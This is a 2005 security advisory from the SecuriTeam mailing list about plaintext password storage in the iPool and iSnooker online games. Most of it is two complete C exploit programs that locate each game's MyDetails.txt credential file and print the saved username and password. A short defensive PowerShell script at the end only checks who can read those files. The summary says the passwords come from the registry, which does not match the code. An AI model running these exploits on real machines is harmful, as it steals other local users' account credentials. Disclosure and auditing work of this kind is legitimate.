[EXPL] iPool and iSnooker Local Password Disclosure
From: SecuriTeam (support_at_securiteam.com)
Date: 03/17/05
To: list@securiteam.com Date: 17 Mar 2005 11:52:18 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
iPool and iSnooker Local Password Disclosure
------------------------------------------------------------------------
SUMMARY
<http://www.thepoolclub.com> iPool and <http://www.thesnookerclub.com>
iSnooker are online pool and snooker games. iPool and iSnooker store
user passwords in plaintext, which allows a local attacker to read the
passwords from the registry.
DETAILS
Exploit (iPool) :
/*************************************************************
iPool <= v1.6.81 Local Password Disclosure Exploit by Kozan
Application: iPool 1.6.81
Vendor:
Memir Software - memirsoftware.com and
The Pool Club - thepoolclub.com
Vulnerable Description:
iPool 1.6.81 discloses passwords to local users.
Discovered & Coded by Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com
**************************************************************/
#include <stdio.h>
#include <string.h>
#include <windows.h>

#define BUFSIZE 100

HKEY hKey;
char prgfiles[BUFSIZE];
DWORD dwBufLen = BUFSIZE - 1;   /* keep one byte so the value stays NUL-terminated */
LONG lRet;

int main()
{
    const char *relpath = "\\ThePoolClub\\iPool\\MyDetails.txt";
    char pwdfile[MAX_PATH], username[BUFSIZE] = "", password[BUFSIZE] = "";
    char ch[100], ch2[100];
    long addr;
    int i, y;
    FILE *fp;

    /* Look up the Program Files directory in the registry. */
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                     "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                     0, KEY_QUERY_VALUE, &hKey) == ERROR_SUCCESS)
    {
        lRet = RegQueryValueEx(hKey, "ProgramFilesDir", NULL, NULL,
                               (LPBYTE) prgfiles, &dwBufLen);
        if ((lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE)) {
            RegCloseKey(hKey);
            printf("An error occured. Can't get password!\n");
            return -1;
        }
        RegCloseKey(hKey);
    }
    else
    {
        printf("An error occured. Can't get password!\n");
        return -1;
    }

    printf("\n\niPool 1.6.81 Local Password Disclosure Exploit by Kozan\n");
    printf("Credits to ATmaCA\n");
    printf("kozan at netmagister\n");
    printf("www.netmagister.com - www.spyinstructors.com\n\n");

    /* Build the path of the file holding the saved credentials,
       checking the length instead of appending blindly. */
    if (strlen(prgfiles) + strlen(relpath) >= sizeof(pwdfile))
    {
        printf("An error occured. Can't get password!\n");
        return -1;
    }
    strcpy(pwdfile, prgfiles);
    strcat(pwdfile, relpath);

    if ((fp = fopen(pwdfile, "rb")) == NULL)
    {
        printf("An error occured. Can't get password!\n");
        return -1;
    }

    /* First line of the file: the user name, terminated by CR. */
    fseek(fp, 0, SEEK_SET);
    for (i = 0; i < 30; i++)
    {
        ch[i] = getc(fp);
        if (ch[i] == 0x0D)
        {
            ch[i] = '\0';
            strcpy(username, ch);
            break;
        }
    }

    /* Skip the LF after the CR; the second line is the password. */
    addr = ftell(fp);
    fseek(fp, addr + 1, SEEK_SET);
    for (y = 0; y < 30; y++)
    {
        ch2[y] = getc(fp);
        if (ch2[y] == 0x0D)
        {
            ch2[y] = '\0';
            strcpy(password, ch2);
            break;
        }
    }
    fclose(fp);

    printf("Username : %s\n", username);
    printf("Password : %s\n", password);
    return 0;
}
Exploit (iSnooker):
/*****************************************************************
iSnooker <= v1.6.8 Local Password Disclosure Exploit by Kozan
Application: iSnooker 1.6.8
Vendor:
Memir Software - memirsoftware.com and
The Snooker Club - thesnookerclub.com
Vulnerable Description:
iSnooker 1.6.8 discloses passwords to local users.
Discovered & Coded by Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan at netmagister
*****************************************************************/
#include <stdio.h>
#include <string.h>
#include <windows.h>

#define BUFSIZE 100

HKEY hKey;
char prgfiles[BUFSIZE];
DWORD dwBufLen = BUFSIZE - 1;   /* keep one byte so the value stays NUL-terminated */
LONG lRet;

int main()
{
    const char *relpath = "\\TheSnookerClub\\iSnooker\\MyDetails.txt";
    char pwdfile[MAX_PATH], username[BUFSIZE] = "", password[BUFSIZE] = "";
    char ch[100], ch2[100];
    long addr;
    int i, y;
    FILE *fp;

    /* Look up the Program Files directory in the registry. */
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                     "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                     0, KEY_QUERY_VALUE, &hKey) == ERROR_SUCCESS)
    {
        lRet = RegQueryValueEx(hKey, "ProgramFilesDir", NULL, NULL,
                               (LPBYTE) prgfiles, &dwBufLen);
        if ((lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE)) {
            RegCloseKey(hKey);
            printf("An error occured. Can't get password!\n");
            return -1;
        }
        RegCloseKey(hKey);
    }
    else
    {
        printf("An error occured. Can't get password!\n");
        return -1;
    }

    printf("\n\niSnooker 1.6.8 Local Password Disclosure Exploit by Kozan\n");
    printf("Credits to ATmaCA\n");
    printf("kozan@netmagister.com\n");
    printf("www.netmagister.com - www.spyinstructors.com\n\n");

    /* Build the path of the file holding the saved credentials,
       checking the length instead of appending blindly. */
    if (strlen(prgfiles) + strlen(relpath) >= sizeof(pwdfile))
    {
        printf("An error occured. Can't get password!\n");
        return -1;
    }
    strcpy(pwdfile, prgfiles);
    strcat(pwdfile, relpath);

    if ((fp = fopen(pwdfile, "rb")) == NULL)
    {
        printf("An error occured. Can't get password!\n");
        return -1;
    }

    /* First line of the file: the user name, terminated by CR. */
    fseek(fp, 0, SEEK_SET);
    for (i = 0; i < 30; i++)
    {
        ch[i] = getc(fp);
        if (ch[i] == 0x0D)
        {
            ch[i] = '\0';
            strcpy(username, ch);
            break;
        }
    }

    /* Skip the LF after the CR; the second line is the password. */
    addr = ftell(fp);
    fseek(fp, addr + 1, SEEK_SET);
    for (y = 0; y < 30; y++)
    {
        ch2[y] = getc(fp);
        if (ch2[y] == 0x0D)
        {
            ch2[y] = '\0';
            strcpy(password, ch2);
            break;
        }
    }
    fclose(fp);

    printf("Username : %s\n", username);
    printf("Password : %s\n", password);
    return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:kozan@netmagister.com>
ATmaCA.
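
One way to check a host for the exposure described above, as an added example that is not part of the original advisory or the exploit author's code: it reports whether the two MyDetails.txt files named in the exploits exist and which broad local groups are allowed to read them, without opening the files. The second Program Files root and the list of well-known SIDs are assumptions made for this example.

```powershell
# Added audit example: presence and read exposure of the credential files named
# in the advisory. It inspects ACLs only; file contents are never read or printed.
$relativePaths = @(
    'ThePoolClub\iPool\MyDetails.txt',
    'TheSnookerClub\iSnooker\MyDetails.txt'
)

# Assumption: installs live under a Program Files root (32-bit root included).
$roots = @($env:ProgramFiles, ${env:ProgramFiles(x86)}) |
    Where-Object { $_ } | Select-Object -Unique

# Assumption: these well-known SIDs stand for "any local user". SIDs are used
# instead of group names so the check also works on localized Windows.
$broadSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-4'      = 'INTERACTIVE'
    'S-1-5-32-545' = 'BUILTIN\Users'
}
$readData = [int][System.Security.AccessControl.FileSystemRights]::ReadData
$sidType  = [System.Security.Principal.SecurityIdentifier]

$findings = foreach ($root in $roots) {
    foreach ($rel in $relativePaths) {
        $path = Join-Path -Path $root -ChildPath $rel
        if (-not (Test-Path -LiteralPath $path -PathType Leaf)) { continue }

        $acl = Get-Acl -LiteralPath $path
        # Explicit and inherited ACEs, with identities returned as SIDs.
        $exposedTo = @(
            $acl.GetAccessRules($true, $true, $sidType) | Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                (([int]$_.FileSystemRights -band $readData) -ne 0) -and
                $broadSids.ContainsKey($_.IdentityReference.Value)
            } | ForEach-Object { $broadSids[$_.IdentityReference.Value] } |
                Select-Object -Unique
        )

        [pscustomobject]@{
            Path            = $path
            Owner           = $acl.Owner
            BroadlyReadable = ($exposedTo.Count -gt 0)
            ReadableBy      = ($exposedTo -join ', ')
        }
    }
}

if ($findings) { $findings | Format-List }
else { 'No MyDetails.txt credential files found under Program Files.' }
```

A finding with BroadlyReadable set to True means any local account can open the saved credentials; restricting the ACL to the owning user limits the exposure but does not change the fact that the password is stored in plaintext.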